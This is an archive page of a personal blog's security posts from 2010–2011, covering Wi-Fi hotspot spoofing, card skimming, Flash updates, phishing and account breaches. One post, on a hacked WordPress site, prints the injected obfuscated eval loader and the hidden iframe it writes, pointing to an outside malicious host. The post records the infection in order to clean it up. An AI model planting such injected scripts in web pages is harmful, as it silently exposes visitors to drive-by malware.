Archive for the ‘Security’ Category

TapBT Wi-Fi users beware

1 Nov 2011 14:34 by Rick

The BT broadband offering has a popular feature which allows you to access the internet from your mobile devices even when away from home. When everyone installs their Wi-Fi routers the process simultaneously sets up another Wi-Fi SSID called “BT Fon” (or sometimes “BT Openzone”, and I have seen both at once). With agreement (I think) these are configured so any BT user can sign in to them using their home account details and gain access to the internet via your connection. For privacy, identity and accounting this is kept entirely separate from the home owner’s connection and the only cost to them is a possible bandwidth reduction caused by the extra load. In practice this is a small price to pay for the ability of friends and relations to gain internet access without knowing your security code. You may get a few passers by briefly tapping your connection but they are not going to do it persistently because they have to be BT broadband customers themselves which they are paying for. It may be more of a problem if you live next to a park or café but not too serious.

This all sounds good—you are providing a service for others and in return they provide a service to you when you need it. There are millions of customers and hence millions of potential free Wi-Fi hotspots for you to use. There is security, in the form of an account and password, to verify identity which protects BT’s and the home owner’s interests.

What there is not is any security to protect the mobile user. The catch is that the Wi-Fi hot spot is only identified by it’s name (“BT Fon” or “BT Openzone”)—but anyone can create an SSID called that! So you don’t know if you are connecting to a real BT service or a fake one. This is true with any Wi-Fi hotspot of course, but much more insidious for these because of their ubiquity. There is a sign on process the first time you use one (and even that can be faked) but it is not required for subsequent connections as it is done automatically. For smart phone users it is potentially even more serious. As is pointed out in this Guardian article from April, phones sometimes connect even while in your pocket. O2 iPhones are configured to do this by default because of a partnership between O2 and BT.

BT have known about this problem for some time but have so far declined to do anything about it or even let anyone know. This is disappointing considering that their security team is one of the most respected in the industry.

TapHacked Again

16 Jun 2011 10:01 by Rick

Since the problem in 2007 my web sites have been running pretty smoothly. I never did get to the bottom of what caused it but the suspicion was an out of date WordPress install which had some sort of vulnerability.

This month it happened again. I first spotted it on 6 Jun when I saw a big iFrame appear below the page footer of this blog. Again there was a suspicion of a down-level WordPress but it was only one dot point off current. Never-the-less, I updated and the problem went away by wiping out the infected files. In fact, I did it so fast that I didn’t have time to investigate fully.

A week later, the problem was back and now, because I was fully up to date, I had to look more closely.

The code inserted was

[script]var t="";var arr="...";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);[/script]

which decodes to execute

document.write('[iframe src="http://esformofset.com/forum/php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"][/iframe]')

The hacked code was tacked on the end of module wp-blog-header.php so it is clear that the infection understands WordPress. Later I was informed by a regular visitor, that some other (static) pages on the site were also infected. One drawback of running a browser with full protection like Firefox with NoScript is that you can’t easily spot things like this when they occur. Anyway, I spent an hour yesterday evening clearing up the rest of the site. It had infected almost all files called index.htm and home.htm and one or two others with a high page rank due to a lot of external referrers. The inserted code was after <body> and was either identical or very similar to the above (just a change of target web page).

So it is clear that the infection mechanism is clever, I just wish I know what it was. I am no longer convinced that it is anything to do with WordPress – a ZeroDay vulnerability like this would have been reported by now and, at the time of writing I can find no other internet reference to this particular infection. There is no other active content on the site so that leaves the possibility of either a cracked password (all of which are strong and recently changed) or a compromised host server.

TapCard Skimming

28 May 2011 07:59 by Rick

Yesterday I had my credit card skimmed in a luxury goods shop in Cabot Circus. Credit card skimming is the process used by dodgy waiters and the like to steal the details off your card for use on the black market. It is often done using a small device concealed in the palm of their hand which reads the mag stripe while walking back to the till. This scam is, in fact, dying out as there are much easier ways for the criminals to get numbers in bulk, but it still used by small time crooks.

So, what happened in the shop? They had a skimmer attached to the front of the till – I should point out here that the action of the assistant was not criminal and, I will presume that the retail chain is not either. But they are foolish. Their system requires the credit card number before it will print a receipts. The PDQ chip-and-pin terminal they use for payment is not connected to the till system, and for good reason. They have no legitimate reason to collect and store the credit card numbers. In fact, I can’t imagine what they do with them. If there is a query over the payment (if the card subsequently turns out to be stolen for instance) then the merchant account provider, the people who process the transaction, have all the information necessary to pursue the case.

Larger retailers like supermarkets do have their systems connected together. They are operating as their own merchant provider and communicate directly with the credit card companies but they are then required to meet much more stringent security requirements on their whole system.

So if you see this happening – complain. I only noticed because the mag stripe on my card is faulty (it “accidentally” got too close to a strong magnet) and they had to type the number in by hand. It is also worth while noting the three digit number on the back of your card and then covering it up with a sticker. That will hinder online fraud.

I will report back here if the managing director of the chain concerned replies.

TapHow incompetent can a software company be

10 Feb 2011 09:15 by Rick

I mean, of course, Adobe. I have written before about the hoops you need to go through to get copies of their critical security upgrades for the Flash products. Now they have cut off one of the little ruses I used so that it is now no longer possible to download the upgrade for Internet Explorer. All you get is flashax.exe, which is self deleting as soon as you run it (how stupid is that) and only runs an “Adobe Installation Helper” which downloads and runs the real product. Not a lot of help if you are not connected to the internet at the time. One of my systems will not be upgraded this time around because it can’t due to a firewall—perhaps I should sue for consequent damage when it gets infected.

Now all this fiddling about would perhaps make sense if the product was hundreds of MB and a download needed to continue if interrupted. But it is 2.7MB and takes a few seconds to download and a few more to install. What we want is an upgrade that we can download and save to run later and one that does all situations in one go – not separate for IE and other browsers.

[12 Feb—they’ve fixed it now]

TapSkype Newsletter?

12 Jan 2011 12:47 by Rick

If you see an email announcing itself as from “Skype Newsletter”, check very carefully. Most, if not all of these are bogus. They are spammers trying to get your login details and maybe get you to pay for an upgrade to a free product or install malware on your system.

TapThe Battle of Gloucester Cathedral

14 Dec 2010 14:46 by Rick

The Spectator reports

Annabel Hayter, chairwoman of Gloucester Cathedral Flower Guild, received an email saying that she and her 60 fellow flower arrangers would have to undergo a CRB check. CRB stands for Criminal Records Bureau, and a CRB check is a time-consuming, sometimes expensive, pretty much always pointless vetting procedure that you must go through if you work with children or ‘vulnerable adults’. Everybody else had been checked: the ‘welcomers’ at the cathedral door; the cathedral guides; the whole of the cathedral office (though they rarely left their room). The flower guild was all that remained.

The cathedral authorities expected no resistance. Though the increasing demand for ever tighter safety regulation has become one of the biggest blights on Britain today, we are all strangely supine: frightened not to comply. Not so Annabel Hayter. ‘I am not going to do it,’ she said. And her act of rebellion sparked a mini-revolution among the other cathedral flower ladies. In total she received 30 letters from guild members who judged vetting to be either an invasion of privacy (which it certainly is) insecure (the CRB has a frightening tendency to return the wrong results) or unnecessary (they are the least likely paedophiles in the country). Several threatened to resign if forced to undergo it.

Follow the rest of the story for other examples of the CRB cancer. Thanks to Schneier on Security for the pointer.

TapGawker Media hacked

10:11 by Rick

I have heard today that this prominent publishing house, which includes Lifehacker, Gizmodo (and, ahem, Fleshbot), has had its database of accounts compromised. There is not much point in changing your password there yet, but, if you use the same one elsewhere, it would be a good idea to change them NOW.

Thanks to SANS ISC for the information. Lots more information here.

TapProxy Spam

6 Oct 2010 08:51 by Rick

I had a strange comment that leaked through the spam filter today. The content was just an IP address—211.138.124.211:80. That turns out to be a proxy machine in Hangzhou in Zhejiang, China owned by China Mobile Communications Corporation. The spam link was also interesting. It appeared to point to content that was taken from a US local paper (from Mount Vernon) but the language was strange. Here is an extract…

A name from a pointy-eyed neighbor culminated in the arrest of three suspected burglars and the restoration of nearly half of the almost $1,200 in valuables stolen.

The decision came in just after 12:40 Thursday afternoon with a precise description of the three suspects, the automotive they have been in and the direction of travel. The descriptions matched an earlier name from another deal with on Mount Vernon on suspicious persons.

I think it has been machine translated into another language and back again to disguise the source.

TapAnother Flash Shock(wave)

26 Aug 2010 11:20 by Rick

Adobe announced yesterday that there is a security patch for Shockwave Player which users should install. However, it would be worth first checking that you have the product in the first place and, if not, then you probably don’t need it at all. Very little content on the web uses it.

Just to confuse matters, the Firefox plugin that Adobe installs for their Flash product is called “Shockwave Flash.” This is one you probably do want as it makes surfing the web a bit easier.

TapiTunes account

9 Jul 2010 12:16 by Rick

You may (or may not) have heard that some iTunes accounts have been hacked recently. One incident was a developer who managed to elevate all his products into the top 50 which made them look really popular. Other more isolated incidents have been to use the hacked accounts to purchase downloads, though no one is quite sure how the perpetrator managed to gain anything worthwhile.

Anyway, the recommendation is that you change you iTunes password, as always, but also to remove any automatic credit card from the account. This is a good recommendation in any case because these card details held by vendors just in case you should happen to pass by again are at risk if anything subverts their systems.

The snag is, if you don’t happen to have your iTunes registered system with you, either iP* device or computer, then how do you change your account. There is no obvious web site you can login to except by starting up the iTunes software which you don’t have. What is not widely known is that the “Apple-id” that you use to purchase from the Apple web store is actually the same account so you can reset it there. Go to www.apple.com, change to your correct country (at the bottom of the screen), move to the Store and then, at the top right is an “Account” button. Login there and change you details as required.

^ Top